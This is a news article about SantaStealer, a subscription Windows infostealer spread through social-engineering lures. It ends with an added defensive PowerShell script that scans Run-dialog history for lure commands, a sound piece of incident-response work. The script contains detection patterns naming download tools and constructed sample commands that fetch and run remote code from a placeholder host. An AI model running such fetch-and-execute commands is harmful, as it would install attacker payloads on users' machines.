The holiday season may be nearly over, but for some Windows users Christmas may have brought an unwelcome surprise. The season's biggest worry is not a broken gadget but a password-stealing piece of malware called SantaStealer.
Unlike the real Santa, this one takes rather than gives: credentials, cryptocurrency wallets, and sensitive data. Security researchers at Rapid7 Labs first spotted SantaStealer at the beginning of December, just in time for the busiest online shopping season of the year.
Milan Spinka, a security researcher and ethical hacker at Rapid7, said the malware was launched shortly before Christmas and was already being sold through Telegram channels and in underground cybercrime marketplaces.
What is SantaStealer?
SantaStealer is sold as malware-as-a-service: criminals who want to use it pay a monthly subscription. Once deployed, it collects and exfiltrates sensitive documents, usernames, passwords, cryptocurrency wallets, and application data from a very wide range of programs.
Spinka notes that it is stealthy enough that victims may never notice it. The malware runs entirely in memory, which makes it hard to detect with the traditional file-based scans that many users rely on.
How the Malware Operates on Windows Systems
SantaStealer is modular, so attackers can enable different functions according to their needs. Its features include capturing desktop screenshots and extracting data from popular applications such as Google Chrome.
Although the malware can get around Chrome's app-bound encryption protections, the researchers point out that this is not a remote exploit: the bypass only comes into play once the attacker's code is already running on the machine. The victim has to manually run an embedded file, usually after being tricked into believing it is legitimate.
The service is priced at $175 to $300 per month and appears to be run by a Russian-speaking developer. That pricing limits how many criminals gain access to the tool, but it also means the malware tends to be used deliberately, in planned campaigns, rather than sprayed at random.
This ultimately raises the risk for users who fall into expertly crafted social-engineering traps.
What Makes Things Worse, and How to Reduce the Risk
The holiday season is one of cyber criminals' favourite times of year, because people are more likely to click unfamiliar links, download cracked software, or run files that promise game cheats, discounts, or even "human verification" checks.
Spinka says the operators rely heavily on fake tech-support messages or on instructions that ask users to run commands on their own computers.
To reduce the risk of infection, Rapid7 advises being very careful with unknown e-mail attachments, suspicious links, and any request to perform system-level actions.
Running unverified code, pirated software, or browser extensions from untrusted sources greatly increases exposure to SantaStealer. Microsoft also provides a range of security resources and professional security guidance to help Windows users detect and prevent malicious activity before it causes serious damage.
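Because the lure described above ends with the victim pasting a command into the Windows Run dialog, one practical check an administrator or responder can make is to review what has been run that way. The following PowerShell script is an added example, not code from the article or from Rapid7. It reads Explorer's RunMRU key (a well-known per-user artifact that records Run-dialog history) and flags commands that match generic loader patterns (hidden PowerShell windows, in-memory execution, remote HTA files, LOLBin downloads). The patterns are general indicators, not SantaStealer-specific IOCs, since the page publishes none; the sample commands and example.invalid URLs are constructed for the demonstration.

```powershell
# Added example (not from the article or Rapid7): hunt for "paste this command"
# lures on a Windows host. Explorer records every Run-dialog (Win+R) command in
# HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; each value is
# stored as "<command>\1" and MRUList gives the most-recent-first order.
# The patterns are generic loader indicators, not SantaStealer IOCs.

$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Regexes (-match is case-insensitive) for what a fake "verification" or
# tech-support lure typically asks the user to run.
$SuspiciousPatterns = @(
    'powershell(\.exe)?\s.*-(enc|encodedcommand|e)\b',                      # encoded payload
    'powershell(\.exe)?\s.*-w(indowstyle)?\s+hidden',                         # hidden window
    '\b(iex|invoke-expression)\b',                                            # in-memory execution
    '(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget)\s.*https?://',
    '\bmshta(\.exe)?\s+https?://',                                            # remote HTA
    '\bcertutil(\.exe)?\s.*-urlcache',                                        # LOLBin download
    '\bbitsadmin(\.exe)?\s.*/transfer',
    '\bcmd(\.exe)?\s+/c\s+.*(curl|powershell|mshta)'
)

function Test-SuspiciousRunCommand {
    param([Parameter(Mandatory)][string]$Command)
    # Return the first matching pattern, or $null if the command looks benign.
    foreach ($p in $SuspiciousPatterns) {
        if ($Command -match $p) { return $p }
    }
    return $null
}

function Get-RunMruCommands {
    # Read RunMRU in MRUList order (most recent first); returns nothing if absent.
    if (-not (Test-Path $RunMruPath)) { return @() }
    $props = Get-ItemProperty -Path $RunMruPath
    $order = if ($props.MRUList) { $props.MRUList.ToCharArray() } else { @() }
    foreach ($letter in $order) {
        $name = [string]$letter
        $raw  = $props.$name
        if ($raw) { $raw -replace '\\1$', '' }   # strip the trailing "\1" marker
    }
}

function Find-SuspiciousRunMru {
    param([string[]]$Commands = (Get-RunMruCommands))
    foreach ($cmd in $Commands) {
        $hit = Test-SuspiciousRunCommand -Command $cmd
        if ($hit) {
            [pscustomobject]@{ Command = $cmd; MatchedPattern = $hit }
        }
    }
}

# Constructed sample entries (not real captures) so the logic can be checked offline.
$SampleCommands = @(
    'notepad',
    'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify.ps1)"',
    'mshta https://example.invalid/captcha.hta',
    'cmd /c curl -s https://example.invalid/s | cmd',
    'calc.exe'
)

Write-Host '== Constructed samples =='
Find-SuspiciousRunMru -Commands $SampleCommands | Format-Table -AutoSize

Write-Host '== Live RunMRU for the current user =='
Find-SuspiciousRunMru | Format-Table -AutoSize
```

RunMRU is per user, so run the live check in the context of the account that received the lure (or load each profile's NTUSER.DAT when triaging a disk image). It only captures the Run dialog; commands pasted directly into a terminal are not recorded there, so pair this with PowerShell script-block logging (Event ID 4104) for fuller coverage. A match is a lead, not a verdict: confirm it against the user and the host's process and network history before acting.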
SantaStealer is a strong reminder that cyber threats do not take holidays. As users move into the new year, online vigilance is as vital as strong passwords or installed updates.
The festive season may be over, but cybercriminals are still at work, and this is one Santa you definitely don't want paying another visit.